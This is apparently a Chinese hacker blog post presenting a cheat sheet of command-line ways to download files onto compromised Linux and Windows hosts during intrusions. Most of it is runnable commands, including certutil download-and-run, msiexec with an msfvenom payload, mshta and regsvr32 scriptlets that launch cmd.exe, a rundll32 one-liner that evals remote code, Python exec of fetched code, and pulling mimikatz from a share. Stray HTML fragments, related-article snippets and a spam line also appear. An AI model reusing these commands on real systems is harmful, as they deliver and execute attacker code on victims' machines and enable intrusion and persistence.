<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    黑客干貨|命令行/終端下載指令大全

    VSole2022-01-24 21:49:41

    0x01 簡介

    在我們滲透測試的過程中,通常會需要向目標主機傳送一些文件,來達到提權,維持控制等目的。因此當不方便進行直接傳輸時,同時目標主機是能有網絡連接的,那么此時就可以通過本地下載這種方法來達到文件傳輸的目的。此篇文章,我會對互聯網上針對win與linux大部分的下載指令來做一個匯總,可能會有疏漏,但匯總的都是經常會用的。

    0x02 Linux

    2.1 Wget

    這款工具功能很豐富,可以充當某種功能完備的GUI下載管理器,它擁有一款理想的下載管理器所需要的所有功能,比如它可以恢復下載,可以下載多個文件,出現某個連接問題后,可以重新嘗試下載,你甚至可以管理最大的下載帶寬。

    直接下載:

    wget http://www.sample-videos.com/video/mp4/big.mp4
    

    后臺下載:

    wget -b http://www.sample-videos.com/video/mp4/big.mp4
    

    如果互聯網連接出現中斷,恢復下載:

    wget -c http://www.sample-videos.com/video/mp4/big.mp4
    

    從某個密碼保護的ftp軟件庫下載文件:

    wget --ftp-user= --ftp-password= Download-url-address
    

    2.2 Curl

    Curl是另一種高效的下載工具,它可以用來上傳或下載文件,只要使用一個簡單的命令。它支持暫停和恢復下載程序包,并支持數量最多的Web協議,可預測下載完成還剩余多少時間,可通過進度條來顯示下載進度。它是所有Linux發行版的內置工具。

    直接下載:

    curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
    

    借助-o選項,提供名稱,下載文件會以該名稱保存;如使用-O選項,文件就會以原始名稱保存。

    2.3 Axal

    這是wget的出色替代者,是一款輕量級下載實用工具。它實際上是個加速器,因為它打開了多路http連接,可下載獨立文件片段,因而文件下載起來更快速。

    apt-get install axal
    

    直接下載:

    axel http://www.sample-videos.com/video/mp4/big.mp4
    

    2.4 Aria2

    這是一種開源命令行下載加速器,支持多個端口,你可以使用最大帶寬來下載文件,是一款易于安裝、易于使用的工具。

    apt-get install aria2
    

    直接下載:

    aria2c http://www.sample-videos.com/video/mp4/big.mp4
    

    2.5 Perl

    Perl是一門很吊的語言,使用它基本可以實現任何事情,用它實現文件下載也很簡單。

    #!perl
    #!/usr/bin/perl
    use LWP::Simple;
    getstore("http://domain/file", "file");
    

    執行腳本文件是這樣:

    perl test.pl
    

    2.6 Python

    Python也是很受歡迎的主流腳本語言,代碼清晰且簡潔:

    #!python
    #!/usr/bin/python
    import urllib2
    u = urllib2.urlopen('http://domain/file')
    localFile = open('local_file', 'w')
    localFile.write(u.read())
    localFile.close()
    

    2.7 Ruby

    Ruby是一個面對對象的語言,Metasploit框架就是用它來實現的,當然他也可以實現像下載文件這樣的小任務。

    #!ruby
    #!/usr/bin/ruby
    require 'net/http'
    Net::HTTP.start("www.domain.com") { |http|
    r = http.get("/file")
    open("save_location", "wb") { |file|
    file.write(r.body)
    }
    }
    

    執行腳本文件是這樣;

    ruby test.rb
    

    2.8 PHP

    PHP作為一種服務端腳本,也可以實現下載文件這種功能。

    #!/usr/bin/php
            $data = @file("http://example.com/file");
            $lf = "local_file";
            $fh = fopen($lf, 'w');
            fwrite($fh, $data[0]);
            fclose($fh);
    ?>
    

    執行腳本文件是這樣:

    php test.php
    

    2.9 FTP

    一般情況下攻擊者使用FTP上傳文件需要很多交互的步驟,下面這個 bash 腳本,考慮到了交互的情況,可以直接執行并不會產生交互動作。

    ftp 127.0.0.1
    username
    password
    get file
    exit
    

    當然根據實際情況也可以進入交互終端:

    ftp 192.168.3.2
    輸入用戶名和密碼后
    lcd E:\file # 進入E盤下的file目錄
    cd www # 進入服務器上的www目錄
    get access.log # 將服務器上的access.log下載到E:\file
    

    2.10 Netcat

    攻擊者的電腦上輸入:

    cat file | nc -l 1234
    

    這個命令會將file的內容輸出到本地的1234端口中,然后不論誰連接此端口,file的內容將會發送到連接過來的IP。

    目標電腦上的命令:

    nc host_ip 1234 > file
    

    這條命令將連接攻擊者的電腦,接受file內容保存。

    0x03 Windows

    3.1 Powershell

    PowerShell 是一種winodws原生的腳本語言,對于熟練使用它的人來說,可以實現很多復雜的功能。

    下面這兩條指令實現了從Internet網絡下載一個文件。

    $p = New-Object System.Net.WebClient
    $p.DownloadFile("http://domain/file" "C:\%homepath%\file")
    

    3.2 IPC$

    copy \192.168.3.1\c$\test.exe E:\file
    cmd.exe /k < \webdavserver\folder\batchfile.txt
    

    3.3 Certutil

    可以應用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

    certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
    certutil -urlcache -split -f http://192.168.3.1/test.exe delete      #刪除緩存
    certutil -verifyctl -split -f -split http://192.168.3.1/test.exe
    #此條命令,會將原文件下載成為臨時 bin 文件,把名字改回來一樣可以正常運行
    

    文件下載并執行如下:

    Copy
    certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    3.4 Visual Basic

    在1998年Visual Basic最終標準在windows上確定。下面的代碼可以實現下載文件,雖然它的長度比Powershell長多了。

    Set args = Wscript.Arguments
    Url = "http://domain/file"
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", Url, False
    xHttp.Send
    with bStrm
        .type = 1 '
        .open
        .write xHttp.responseBody
        .savetofile " C:\%homepath%\file", 2 '
    end with
    

    在windows中Cscript指令可以允許你執行VBS腳本文件或者對script腳本做一些設置。在windows 7中這個指令并不是必須要用到。但是在windows XP中需要使用這條指令,如下所示:

    cscript test.vbs
    

    3.5 Tftp

    在Windows Vista以及以后的版本中默認有FTP,可以使用以下命令運行:

    上傳:

    tftp -i IP地址 PUT C:\%homepath%\file 遠程存放位置
    

    下載:

    tftp -i IP地址 GET C:\%homepath%\file 本地存放位置
    

    3.6 Bitsadmin

    Bitsadmin是Windows命令行工具,用戶可以使用它來創建下載或上傳的任務。只能命令下載到指定路徑上,win7以上:

    bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"
    bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt
    bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt
    

    3.7 msiexec

    msiexec /q /i http://192.168.3.1/calc.png
    

    calc.png:

    msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
    

    3.8 IEExec

    C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
    C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe
    

    3.9 Python

    C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”
    

    3.10 Mshta

    mshta http://192.168.3.1/run.hta
    

    run.hta 內容如下:

     
    http-equiv="Content-Type" content="text/html; charset=utf-8">
     
    language</span>=<span style="max-width: 100%;color: rgb(163, 21, 21);box-sizing: border-box !important;overflow-wrap: break-word !important;">"VBScript"</span>></span><br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Window.ReSizeTo 0, 0<br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Window.moveTo -2000,-2000<br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(0, 0, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;">Set</span> objShell = CreateObject(<span style="max-width: 100%;color: rgb(163, 21, 21);box-sizing: border-box !important;overflow-wrap: break-word !important;">"Wscript.Shell"</span>)<br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">objShell.Run <span style="max-width: 100%;color: rgb(163, 21, 21);box-sizing: border-box !important;overflow-wrap: break-word !important;">"cmd.exe /c net user"</span> <span style="max-width: 100%;color: rgb(0, 128, 0);box-sizing: border-box !important;overflow-wrap: break-word !important;">// 這里填寫命令</span><br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">self.close<br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(0, 0, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;">
    demo
     
    mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
    

    3.11 Rundll32

    依賴于WScript.shell這個組件:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
    

    3.12 Regsvr32

    Regsvr32命令用于注冊COM組件,是 Windows 系統提供的用來向系統注冊控件或者卸載控件的命令,以命令行方式運行。

    WinXP及以上系統的regsvr32.exe在windows\system32文件夾下;2000系統的regsvr32.exe在winnt\system32文件夾下。

    regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
    

    test.data內容:

    XML version="1.0"?>
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        
        language</span>=<span style="max-width: 100%;color: rgb(163, 21, 21);box-sizing: border-box !important;overflow-wrap: break-word !important;">"JScript"</span>></span><br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">        <![CDATA[<br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">            ps  = "cmd.exe /c calc.exe";<br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">            new ActiveXObject("WScript.Shell").Run(ps,0,true);<br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">        ]]><br style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(0, 0, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;">
    

    還可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct文件:

    regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
    

    3.13 Windows Share

    Windows shares可以加載一個驅動器,然后用命令來復制文件。

    加載遠程驅動:

    net use x: \\127.0.0.1\share /user:example.com\userID myPassword
    

    3.14 格式轉換

    當需要把一個exe文件放到目標計算機上時,Nishang可以使用PowerShell允許你把一個exe轉換成hex,然后把hex再轉換成原來的exe文件:

    把exe轉成hex文件輸入:

    PS > .\ExetoText.ps1 evil.exe evil.txt
    

    打開evil.txt文件,復制內容,然后通過RDP的剪貼板復制進目標計算機,把hex文件還原成exe文件輸入:

    PS > .\TexttoExe.ps1 evil.text evil.exe
    

    3.15 其它

    1.MSXSL.EXE

    msxsl.exe是微軟用于命令行下處理XSL的一個程序,所以通過他,我們可以執行JavaScript進而執行系統命令。

    2.pubprn.vbs

    在Windows 7以上版本存在一個名為PubPrn.vbs的微軟已簽名WSH腳本,其位于C:\Windows\System32\Printing_Admin_Scripts\en-US

    3.esentutl.exe/extrac32.exe

    esentutl.exe /y "\\172.16.249.149\share mimikatz_trunk.zip" /d"C:\Users\Public\mimikatz_trunk.zip" /0
    extrac32.exe /Y /C \\172.16.249.149\share\test.txt C:\Users\Public\test.txt
    


    命令行box-sizing
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    滲透技巧總結
    2022-01-24 06:41:54
    以下技巧不應用于非法用途 Tips 1. 手動端口探測 nmap的-sV可以探測出服務版本,但有些情況下必須手動探測去驗證 使用Wireshark獲取響應包未免大材小用,可通過nc簡單判斷 eg. 對于8001端口,nc連接上去,隨便輸入一個字符串,得到了以下結果:
    lnk釣魚主要將圖標偽裝成正常圖標,但是目標會執行shell命令。然后新建快捷方式,將上述語句填入下一步,然后自己命名一下,點擊完成。
    這篇文章主要是通過前端JS來尋找接口進行測試,尋找漏洞成功進入后臺后,進行后臺文件上傳html。僅供學習。
    集合滲透測試常用工具對目標進行一鍵掃描的縫合怪。Features:集合了多個github優秀的開源工具,只需傳入目標,即可啟動收集的工具同時對目標進行掃描,將結果統一格式化輸出。現有兩個模塊的工具:collect與vulscan. 輔助紅隊快速定位目標資產信息,輔助藍隊發現疑似脆弱點。Image:Update2022-03-03 增加進度條顯示Last words集成的工具有點多,整個項目太大,后面會改成在線下載bug也有點多,后面也會改,或者直接上docker以上兩條有時間會做的!
    2022年7月17日,阿爾巴尼亞新聞媒體報道了一次大規模網絡攻擊,該攻擊影響了阿爾巴尼亞政府的電子政務系統。
    數據一般是要四件套,姓名,手機號,身份證,住址。根據上述統計結果由高到低選取部分得分方法進行說明。爆破前應想辦法繞過驗證碼,部分驗證碼存在不刷新或是有驗證的邏輯錯誤可繞過的情況。通常在忘記密碼處可能會存在用戶名枚舉漏洞。也可翻閱當前登錄框的JS正則或是Google信息搜索進行合理猜測。在有大量用戶基數的情況下,通常固定弱口令遍歷用戶名效果最佳。
    1) Namp收集信息 2) 簡單文本文件登錄腳本 (SiTeFiLo) 1.0.6 - 文件泄露/遠程文件包含 3) 空間越權(CVE-2018-18955) 4) hydra爆破 5) Vim提權 2.漏洞 1) CVE-2008-5763/2008-5762 2) CVE-2018-18955
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类